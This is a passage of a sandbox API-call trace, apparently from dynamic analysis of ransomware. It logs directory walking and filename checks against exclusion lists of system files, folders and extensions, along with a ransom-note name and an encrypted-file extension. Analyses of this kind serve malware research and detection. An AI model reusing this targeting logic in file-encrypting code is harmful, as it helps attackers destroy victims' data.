lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2770 [0071.109] StrCmpW (psz1=".", psz2=".") returned 0 [0071.109] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.109] StrCmpW (psz1="..", psz2=".") returned 1 [0071.109] StrCmpW (psz1="..", psz2="..") returned 0 [0071.109] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.109] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.109] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.109] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0071.109] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\") returned="C:\\588bce7c90097ed212\\1038\\" [0071.109] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned="C:\\588bce7c90097ed212\\1038\\eula.rtf" [0071.109] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.109] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.109] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.109] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.109] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.109] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.109] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.109] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.109] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.109] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.109] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.109] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.109] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.110] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.110] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.110] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.110] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.110] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.110] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.110] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.110] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.110] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.110] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.110] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.110] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.110] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.110] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.110] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0071.110] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\") returned="C:\\588bce7c90097ed212\\1038\\" [0071.110] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" [0071.110] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.110] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.110] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.110] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.110] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.110] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.110] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.110] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.110] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.111] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.111] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.111] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.111] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.111] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.111] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.111] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.111] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.111] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.111] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.111] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.111] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.111] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.111] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.111] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.111] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.111] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.111] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.111] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0071.111] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\") returned="C:\\588bce7c90097ed212\\1038\\" [0071.111] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" [0071.111] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.111] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.111] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.111] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.111] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.111] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.111] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.111] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.112] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.112] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.112] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.112] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.112] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.112] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.112] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.112] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.112] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.112] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.112] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.112] FindClose (in: hFindFile=0xec2770 | out: hFindFile=0xec2770) returned 1 [0071.112] GetProcessHeap () returned 0xe30000 [0071.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.112] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1040", cAlternateFileName="")) returned 1 [0071.112] StrCmpW (psz1="1040", psz2=".") returned 1 [0071.112] StrCmpW (psz1="1040", psz2="..") returned 1 [0071.112] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.112] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.112] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1040", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0071.112] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\windows\\system32\\") returned 0x0 [0071.112] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.112] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\windows\\system\\") returned 0x0 [0071.112] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.112] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.112] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\appdata\\local\\") returned 0x0 [0071.112] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.112] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\boot\\") returned 0x0 [0071.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\perflogs\\") returned 0x0 [0071.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\programdata\\") returned 0x0 [0071.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\drivers\\") returned 0x0 [0071.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\wsus\\") returned 0x0 [0071.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="crypt_detect") returned 0x0 [0071.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="cryptolocker") returned 0x0 [0071.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="ransomware") returned 0x0 [0071.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="C:\\WINDOWS") returned 0x0 [0071.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="C:\\Program Files") returned 0x0 [0071.113] GetProcessHeap () returned 0xe30000 [0071.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0071.113] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0071.113] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\*") returned="C:\\588bce7c90097ed212\\1040\\*" [0071.113] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2770 [0071.406] StrCmpW (psz1=".", psz2=".") returned 0 [0071.406] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.406] StrCmpW (psz1="..", psz2=".") returned 1 [0071.406] StrCmpW (psz1="..", psz2="..") returned 0 [0071.406] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.406] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.406] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.406] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0071.406] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\") returned="C:\\588bce7c90097ed212\\1040\\" [0071.406] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned="C:\\588bce7c90097ed212\\1040\\eula.rtf" [0071.406] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.406] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.406] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.406] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.406] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.406] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.406] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.406] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.406] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.406] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.406] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.406] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.406] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.406] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.406] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.406] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.406] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.406] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.407] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.407] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.407] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.407] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.407] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.407] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.407] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.407] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.407] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.407] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0071.407] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\") returned="C:\\588bce7c90097ed212\\1040\\" [0071.407] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" [0071.407] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.407] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.407] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.407] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.407] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.407] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.407] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.407] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.407] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.407] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.407] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.407] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.407] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.407] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.407] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.407] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.407] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.407] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.407] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.408] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.408] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.408] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.408] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.408] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.408] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.408] StrCmpW 